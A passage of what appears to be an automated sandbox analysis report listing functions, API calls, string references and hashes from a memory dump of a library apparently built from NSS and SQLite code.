Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,6C62204A), ref: 6C6908CB
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908D7
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908FB

PR_EnterMonitor.NSS3 ref: 6C73693E
TlsGetValue.KERNEL32 ref: 6C736977
TlsGetValue.KERNEL32 ref: 6C7369B8
PR_ExitMonitor.NSS3 ref: 6C736B1E
PR_ExitMonitor.NSS3 ref: 6C736B39
TlsGetValue.KERNEL32 ref: 6C736B62

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
String ID:
API String ID: 4003455268-0
Opcode ID: 9fc8cff1e153e5fa30e1aad932b6b4c452f1ed99f226ce1dc2188a9d04df64ce
Instruction ID: 904a6ca7ad6d6af5e0de09d64afae5dbbedca2e301b8c77e53b4ad09a11cea95
Opcode Fuzzy Hash: 9fc8cff1e153e5fa30e1aad932b6b4c452f1ed99f226ce1dc2188a9d04df64ce
Instruction Fuzzy Hash: A8915E74658120CBDB50DF2DC68095D7BB2FB87308B719669C8488FA1AC775DA81CF92

Function 6C680820 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 1448COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000001,00000001), ref: 6C6811D2

Strings

rows deleted, xrefs: 6C6817D2
@, xrefs: 6C680B17
authorizer malfunction, xrefs: 6C681BD2
not authorized, xrefs: 6C68175E, 6C681763

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: memset
String ID: @$authorizer malfunction$not authorized$rows deleted
API String ID: 2221118986-4041583037
Opcode ID: 0a151a84760913c36d006eb2e54043d2a4e30e1b71fd14b2fcf6e9cc6062edec
Instruction ID: 21c0119fbeea91235131186b6a7bb7a65ca90aba4a0fc36fff8eb3ae7c130dab
Opcode Fuzzy Hash: 0a151a84760913c36d006eb2e54043d2a4e30e1b71fd14b2fcf6e9cc6062edec
Instruction Fuzzy Hash: 49D2BB70E06249CFDB14CFA9C480B9DBBF2BF49308F248269D425ABB51D771E856CB94

Function 6C74C9E0 Relevance: 7.7, APIs: 5, Instructions: 187timeCOMMON

Download Yara Rule

APIs

PR_NormalizeTime.NSS3(00000000,?), ref: 6C74CEA5

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: NormalizeTime
String ID:
API String ID: 1467309002-0
Opcode ID: 38dd2c9cf8e34d1772fa33f557b45ee5b6c5c56c5ad5d860180296b318034f87
Instruction ID: 7391522137d1cc4a5f89f72236b78969a9eb6636febe40ba4080a82e116f4d8d
Opcode Fuzzy Hash: 38dd2c9cf8e34d1772fa33f557b45ee5b6c5c56c5ad5d860180296b318034f87
Instruction Fuzzy Hash: E7719371A057018FC304CF29C584A2ABBE5FF89314F25CA2EE4A9C77A1E730D945CB95

Function 6C7BCDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7BD086
PR_Malloc.NSS3(00000001), ref: 6C7BD0B9
PR_Free.NSS3(?), ref: 6C7BD138

Strings

>, xrefs: 6C7BCF5B

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 5eec6646820aa518cc1896ef5f31abaa803ddd5438da7b621cc19c4246fe48c1
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: D9D15C62B4154A4FFB144C7C8E613DA779787623B4F588335D521BBBE9E6398843C309

Function 6C63AC60 Relevance: 6.4, Strings: 5, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C63AE9F
p{l, xrefs: 6C63ADA7
P{l, xrefs: 6C63ADDB, 6C63ADF5, 6C63AE6A
0{l, xrefs: 6C63ACC0, 6C63AD22, 6C63AD5E, 6C63AE45
winUnlock, xrefs: 6C63AE18

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID:
String ID: 0{l$P{l$p{l$winUnlock$winUnlockReadLock
API String ID: 0-3760178812
Opcode ID: cbf87a87e01eb53be210c926b4303378ed6cd3893c1147e932e1526b2774d363
Instruction ID: 9c8d04559970eca1f3fed2c81261df8de05c5d3def77eb45f8a05d280b6e8b4b
Opcode Fuzzy Hash: cbf87a87e01eb53be210c926b4303378ed6cd3893c1147e932e1526b2774d363
Instruction Fuzzy Hash: 1271A2706083049FDB14CF28E884AAABBF5FF89314F14D62DF95997241D730A985CBD1

Function 6C75AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b77ac8fd03aed36305a67a28c9f365df594fe8a11c8ecf36c7f5d4bee6821b7
Instruction ID: 21241e92cb58bea201a3d399c99be6e0d00d8c4664cca34628aa0f636339bdc6
Opcode Fuzzy Hash: 2b77ac8fd03aed36305a67a28c9f365df594fe8a11c8ecf36c7f5d4bee6821b7
Instruction Fuzzy Hash: 80F1F071F0125A8BDB14CF28DA807B977F1AB8A308F65423DC925D7754EB70A962CBD0

Function 6C710E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C711052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C711086

Strings

h(ql, xrefs: 6C711062, 6C71105D, 6C710F37, 6C711081, 6C711082
h(ql, xrefs: 6C710E55, 6C710EC4, 6C710F3A, 6C710FA7

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: memcpymemset
String ID: h(ql$h(ql
API String ID: 1297977491-2426765051
Opcode ID: 8155f248fc4368d29f8ec2022e0ffada40653c3a100603753a36ab2995ecfec8
Instruction ID: 68359c4a1ce315261f646782d93fee348590f775c99ada6c869251b47effda5c
Opcode Fuzzy Hash: 8155f248fc4368d29f8ec2022e0ffada40653c3a100603753a36ab2995ecfec8
Instruction Fuzzy Hash: 8EA14071F0524A9FCF08DF99CA94AEEB7B6BF88314B188129E904A7B00D735DC15CB90

Function 6C686900 Relevance: 6.3, Strings: 4, Instructions: 1257COMMON

Download Yara Rule

Strings

sqlite\_%, xrefs: 6C686953
authorizer malfunction, xrefs: 6C687910
BBB, xrefs: 6C687207, 6C68780B
not authorized, xrefs: 6C6878EC, 6C6878F1

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: memcpystrlen
String ID: BBB$authorizer malfunction$not authorized$sqlite\_%
API String ID: 3412268980-2664116055
Opcode ID: 0e9bd5af244640f83d7bc718f464b37dc3440b3f75b7519873516bd27d0b4bd3
Instruction ID: e60b001b2b636a592e3a2c1dd37bfa8ee82b7de70226d100c30ee1cf5e637289
Opcode Fuzzy Hash: 0e9bd5af244640f83d7bc718f464b37dc3440b3f75b7519873516bd27d0b4bd3
Instruction Fuzzy Hash: DEC29F70A05205DFCB14CF58C480AA9BBF2FF89308F2481ADE915ABB51D736E956CF94

Function 6C634DB0 Relevance: 5.3, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C635125
p{l, xrefs: 6C634E1C, 6C634E81, 6C634FDE, 6C635047, 6C6350BB, 6C6351A3, 6C63526C
P{l, xrefs: 6C635019, 6C6350FA, 6C635157, 6C6351DE, 6C6351F2, 6C63520D, 6C635220, 6C6352A2, 6C6352B5
0{l, xrefs: 6C634EDE, 6C634F82

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID:
String ID: 0{l$P{l$p{l$winUnlockReadLock
API String ID: 0-1552643205
Opcode ID: dabbb2f6c85a9c32e11ebf3ebbcf8297f6b555182d9bb4d5cf81c9a329b6b6a0
Instruction ID: f6375cc549a3f9d8b1b1c8d18472f1fa7f3f3c5df1288e55dcb97896cb335e0a
Opcode Fuzzy Hash: dabbb2f6c85a9c32e11ebf3ebbcf8297f6b555182d9bb4d5cf81c9a329b6b6a0
Instruction Fuzzy Hash: C6E13A70A083448FDB04DF28D88865ABBF0FF89308F159A2DF89997251E770D985CB86

Function 6C636F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

noskipscan*, xrefs: 6C637067
sz=[0-9]*, xrefs: 6C637049
*?[, xrefs: 6C637034, 6C637052, 6C637070
unordered*, xrefs: 6C63702B

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: f78479c79cf2f816cc8b9374e0aa31e2c8ae5be2237123adf22a3c653208150c
Instruction ID: 78389110d7511ef130693dd28dac32ac8fe20ed4f554c6719149e49945f81749
Opcode Fuzzy Hash: f78479c79cf2f816cc8b9374e0aa31e2c8ae5be2237123adf22a3c653208150c
Instruction Fuzzy Hash: 0A717A72F001258BEB108E6DCD8039A73A29F85318F293278C86DABBD1D7759C4687D9

Function 6C6CEE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6CF019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6C6CF0F9

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: 5564831018f77b345ad2079cda6933eeda3c0f56c4fc08db2c041f39072c16e3
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: AC918075B0061A8BCB14CF68C8916AEB7F1FF95324F24472DD962A7BC0D730A905CB96

Function 6C6F2F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C717929), ref: 6C6F2FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C717929), ref: 6C6F2FE0

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: 4c3d4f6bbb425f8f5e6ff445df8a5547d11ffe42db8746d2f99b310fbd3cb515
Instruction ID: 9e8e713b0304cdc8d4706800e7fae0a701ccc41a75bf389604eab58110ac2e6b
Opcode Fuzzy Hash: 4c3d4f6bbb425f8f5e6ff445df8a5547d11ffe42db8746d2f99b310fbd3cb515
Instruction Fuzzy Hash: 245101B1B059118FDB10CE59C880BAA73B3FF45318F29417AD9299BB01C735E947CB9A

Function 6C6649F0 Relevance: 1.9, APIs: 1, Instructions: 673COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 902c18676e2f6c7b3e4293d938a15d1a005a5ded637f229f22c8164ad8a2f9cf
Instruction ID: fb12154ee831addbfb12bf597317c560434b1482cfdd4b13c11c935fd86e726a
Opcode Fuzzy Hash: 902c18676e2f6c7b3e4293d938a15d1a005a5ded637f229f22c8164ad8a2f9cf
Instruction Fuzzy Hash: AC529C74E002099FDB04CF5AC490BAEBBF2FF89318F248159D815ABB51D775E842CB99

Function 6C6FED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C6FEE3D

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 9f3247050a1a79c9c9bf8ba190f5831e71b0776d1870d4443fd6fc577828efb7
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: 3671D472E027018FE718CF59D8806AABBF3BF98304F15462DD86697B91D734E902CB95

Function 6C6BA820 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

[[jl, xrefs: 6C6BA92D, 6C6BA943

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID:
String ID: [[jl
API String ID: 0-2260154544
Opcode ID: 3f030f746513fe3343909a28f6aa1dd04f782143b689593f443c9c7822a75e4a
Instruction ID: f5db330894816b207ba45f5459afd3c8a5d735d012d23428cc567f7b5276e10d
Opcode Fuzzy Hash: 3f030f746513fe3343909a28f6aa1dd04f782143b689593f443c9c7822a75e4a
Instruction Fuzzy Hash: 5E519D71A01209CFDB04DF19D985BAA7BF5FF49308F26806DE819AB752DB30D861CB94

Function 6C668960 Relevance: .4, Instructions: 381COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 479b8d2f213f65b1b536ab0ea025c35109ca1eff46ca7d7c516c56307c097544
Instruction ID: 90b67016bf877ed7bde47f9c9ce1757b89357787a4d6a9478142adc25b897e01
Opcode Fuzzy Hash: 479b8d2f213f65b1b536ab0ea025c35109ca1eff46ca7d7c516c56307c097544
Instruction Fuzzy Hash: A1D16571F052168FDB48CEBAC4906AEB7F2FB8E304F15852AC955E7A60D7309C41CB99

Function 6C698EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1ad237268a07e07a8edddf5e36596c893aca042226ed49c3ff030be713cff3c
Instruction ID: f5521407aae1b7fb50d731c1da698b5131ead88cb5670660df537a0884e3bf55
Opcode Fuzzy Hash: e1ad237268a07e07a8edddf5e36596c893aca042226ed49c3ff030be713cff3c
Instruction Fuzzy Hash: 2111C432A0021A8BD704CF14D88475AB7A5FF8A35CF14427AD8168FA62C775D886C7C9

Function 6C770C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5afda6475e6292420d11b4ca0f6ec55293208623595fb07273c38785e6386d7
Instruction ID: af780df3b5d01108f0a0f017efa7468c13101873a7c4c3c4feddb8982ec5d940
Opcode Fuzzy Hash: c5afda6475e6292420d11b4ca0f6ec55293208623595fb07273c38785e6386d7
Instruction Fuzzy Hash: F51191757043499FDB10DF28D8806AA77B5FF85368F24807DD8198B701DB72E906CBA4

Function 6C770D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
